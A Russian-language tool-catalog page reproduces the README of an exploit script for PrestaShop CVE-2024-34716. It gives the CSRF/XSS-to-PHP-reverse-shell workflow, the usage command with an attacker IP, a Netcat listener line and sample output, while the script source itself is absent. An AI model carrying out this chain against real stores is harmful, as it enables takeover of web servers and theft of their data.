Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Prestashop-CVE-2024-34716 — Автоматизированный скрипт эксплуатации CSRF для PrestaShop, который загружает и выполняет PHP reverse shell через специально сформированную ZIP-нагрузку, требующий слушатель Netcat для захвата соединения. | Kitploit
Инструменты/GitHubGitHub/0xdtc/prestashop-cve-2024-34716
Генерация полезной нагрузкиЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеRed Teaming
GitHub0xdtc/prestashop-cve-2024-34716

Prestashop-CVE-2024-34716

Автоматизированный скрипт эксплуатации CSRF для PrestaShop, который загружает и выполняет PHP reverse shell через специально сформированную ZIP-нагрузку, требующий слушатель Netcat для захвата соединения.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
111 год назадЕщё не проверено

Сценарий эксплойта для CSRF и Reverse Shell

Этот сценарий автоматизирует эксплойт CSRF (межсайтовая подделка запроса) для загрузки обратной оболочки PHP на веб-сервер цели и её выполнения. Обратная оболочка доставляется в виде ZIP-файла через специально созданную CSRF-нагрузку, которая срабатывает, когда привилегированный пользователь взаимодействует с определённой конечной точкой. Сценарию требуется работающий экземпляр Netcat для захвата соединения обратной оболочки.

Похоже, сейчас не работает, будет обновлено позже

Требования

  • Netcat: Убедитесь, что Netcat установлен и может прослушивать указанный порт (по умолчанию: 9001).
  • Python 3: Используется для раздачи файлов через HTTP.
  • Curl & JQ: Используются для выполнения HTTP-запросов и обработки JSON.

Использование

root@kitploit:~
./exploit.sh <target_url> <admin_endpoint> <admin_email> <attacker_ip>

Аргументы

  • target_url: Базовый URL цели (например, https://example.com).
  • admin_endpoint: Путь к конечной точке импорта темы администратора.
  • admin_email: Адрес электронной почты администратора (для подделки в нагрузке).
  • attacker_ip: IP-адрес, где слушатель обратной оболочки будет принимать соединение.

Пример

root@kitploit:~
./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10

Рабочий процесс эксплойта

  1. Создание обратной оболочки: Генерирует PHP reverse shell с помощью revshells.com, используя предоставленный attacker_ip и порт 9001.
  2. Упаковка в ZIP: Скрипт обратной оболочки (love.php) сжимается в Love-exploit.zip.
  3. Получение CSRF-токена: Извлекает CSRF-токен из цели для авторизации запроса на импорт темы.
  4. Сборка HTML-нагрузки: Создаёт HTML-нагрузку (csrf_payload.html), содержащую JavaScript-скрипт для автоматической отправки вредоносного запроса в панель администратора цели для импорта обратной оболочки.
  5. Настройка HTTP-сервера: Временный HTTP-сервер на порту 8000 раздаёт Love-exploit.zip для импорта целью.
  6. Загрузка XSS и запуск CSRF: CSRF-нагрузка загружается на страницу контактов цели. При доступе она запускает CSRF-атаку.
  7. Слушатель обратной оболочки: Атакующий отслеживает входящие соединения от жертвы с помощью Netcat.

Этапы выполнения

  1. Запустите слушатель Netcat на вашей машине:

    root@kitploit:~
    nc -nvlp 9001
    
  2. Запустите скрипт:

    root@kitploit:~
    ./exploit.sh https://victim.com /admin-panel [email protected] 192.168.1.10
    
  3. Дождитесь, пока цель выполнит CSRF-нагрузку, и получите соединение обратной оболочки.

Вывод

Скрипт выводит следующую информацию во время выполнения:

  • Статус получения CSRF-токена.
  • Статус создания и упаковки обратной оболочки.
  • Статус доставки нагрузки и статус HTTP-сервера.

Важные замечания

  • Разрешения: Этот скрипт требует разрешения на выполнение на целевом сервере. Несанкционированное использование незаконно и наказуемо по закону.
  • Тестовая среда: Используйте только в контролируемой, авторизованной среде, например, в лаборатории кибербезопасности.
  • Конфликты портов: Убедитесь, что порты 8000 (HTTP-сервер) и 9001 (слушатель Netcat) свободны перед запуском скрипта.

Пример вывода

root@kitploit:~
[*] Ensure Netcat is listening: nc -nvlp 9001
[*] Awaiting netcat listener...
[*] Creating PHP reverse shell...
[*] Packaging shell as Love-exploit.zip...
[*] Fetching CSRF token...
[+] CSRF token retrieved: <token_value>
[*] Building HTML payload for CSRF...
[*] Converting HTML to PNG...
[*] Checking for existing HTTP server on port 8000...
[*] Starting new HTTP server on port 8000 for payload delivery...
[*] Uploading XSS payload to trigger CSRF...
[*] Keeping script running to monitor for incoming connections...

Этот документ предназначен для использования тестировщиками на проникновение и исследователями кибербезопасности в контролируемых средах. Неправильное использование этого инструмента в несанкционированных целях строго запрещено.


Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и законных оценок кибербезопасности. Несанкционированное использование против системы без разрешения незаконно и противоречит этическим нормам.

Скачать инструмент